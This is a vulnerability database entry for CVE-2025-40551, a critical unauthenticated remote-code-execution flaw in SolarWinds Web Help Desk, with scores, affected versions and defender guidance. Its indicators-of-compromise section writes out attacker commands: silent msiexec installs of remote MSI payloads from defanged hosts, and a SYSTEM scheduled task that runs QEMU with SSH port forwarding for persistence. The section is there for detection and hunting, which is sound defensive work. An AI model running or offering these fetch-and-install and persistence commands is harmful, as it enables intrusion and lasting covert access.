cbcvebase.
CVE-2025-40551
published 2026-01-28

CVE-2025-40551: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would…

PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2026-02-06
Exploited in the wild
EPSS
84.13%
99.7th percentile
SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

Affected

10 ranges
VendorProductVersion rangeFixed in
msrcazl3_shim_15.4-2_on_azure_linux_3.0
msrcazl3_shim_15.8-5_on_azure_linux_3.0
msrcazure_linux_3.0_arm
msrcazure_linux_3.0_x64
msrccbl2_shim_15.4-2_on_cbl_mariner_2.0
msrccbl2_shim_15.8-1_on_cbl_mariner_2.0
msrccbl_mariner_2.0_arm
msrccbl_mariner_2.0_x64
solarwindsweb_help_desk< 2026.12026.1
solarwindsweb_help_desk

Detection & IOCsextracted from sources · hover to see the quote

urlhxxps://files.catbox[.]moe/tmp9fc.msi
urlhxxps://vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi
domainfiles.catbox[.]moe
domainvdfccjpnedujhrzscjtq.supabase[.]co
filenametmp9fc.msi
filenamev4.msi
filenameqemu-system-x86_64.exe
port22022
commandmsiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi
commandmsiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi
commandSCHTASKS /CREATE /V1 /RU SYSTEM /SC ONSTART /F /TN "TPMProfiler" /TR "C:\Users\\tmp\qemu-system-x86_64.exe -m 1G -smp 1 -hda vault.db - device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::22022-:22"
processwrapper.exe -> java.exe -> cmd.exe
pathC:\Program Files\WebHelpDesk\*\java.exe
pathC:\Program Files (x86)\WebHelpDesk\*\java.exe
pathC:\Users\\tmp\qemu-system-x86_64.exe
otherTPMProfiler (scheduled task name)
path\Device\Mup\*
sigma
any where host.os.type == "windows" and (
(event.category == "library" and
process.executable : ("C:\\Program Files\\WebHelpDesk\\*\\java.exe", "C:\\Program Files (x86)\\WebHelpDesk\\*\\java.exe") and
(dll.path : "\\Device\\Mup\\*" or dll.code_signature.trusted == false or ?dll.code_signature.exists == false)) or
(event.category == "process" and process.name : ("cmd.exe", "powershell.exe", "rundll32.exe") and
process.parent.executable : ("C:\\Program Files\\WebHelpDesk\\*\\java*.exe", "C:\\Program Files (x86)\\WebHelpDesk\\*\\java*.exe"))
)
  • Monitor for cmd.exe, powershell.exe, or rundll32.exe spawned as child processes of java.exe located under C:\Program Files\WebHelpDesk\ or C:\Program Files (x86)\WebHelpDesk\; this represents the initial exploitation shell chain.
  • Alert on DLL loads by WebHelpDesk java.exe where the DLL path starts with \Device\Mup\ (UNC/network path) or the DLL has an untrusted or absent code signature — indicates remote DLL loading post-exploitation.
  • Hunt for creation of a scheduled task named 'TPMProfiler' running as SYSTEM on startup, executing qemu-system-x86_64.exe with SSH port-forwarding arguments (hostfwd=tcp::22022-:22).
  • Detect QEMU (qemu-system-x86_64.exe) running from a user temp directory (C:\Users\*\tmp\) with network device arguments — indicates SSH tunnel establishment for persistent access.
  • Monitor for Cloudflared (Cloudflare Tunnel client) being silently installed via msiexec from a remote GitHub URL, used by threat actors for encrypted C2 tunneling.
  • Detect Active Directory reconnaissance command 'net group "domain computers" /do' executed from processes descended from the WebHelpDesk java.exe process tree.
  • Monitor for NTDS.dit access or copy operations on domain controllers following SolarWinds WHD exploitation; threat actors performed DCSync and NTDS.dit extraction for credential dumping.
  • CVE-2025-40551 affects SolarWinds Web Help Desk 12.8.8 HF1 and all previous versions; scope detection and patching efforts accordingly.
  • ·Attribution of the active exploitation campaigns to CVE-2025-40551 specifically is not yet confirmed; multiple CVEs (CVE-2025-26399, CVE-2025-40536, CVE-2025-40551) may be responsible.
  • ·Elastic Security Labs had not yet observed direct telemetry for this activity at time of publication; detections are based on Microsoft's external reporting.
  • ·Velociraptor and Cloudflared are legitimate tools; their installation alone may appear benign in many enterprise environments — context (parent process, install source URL) is critical for accurate detection.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_msrc5.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.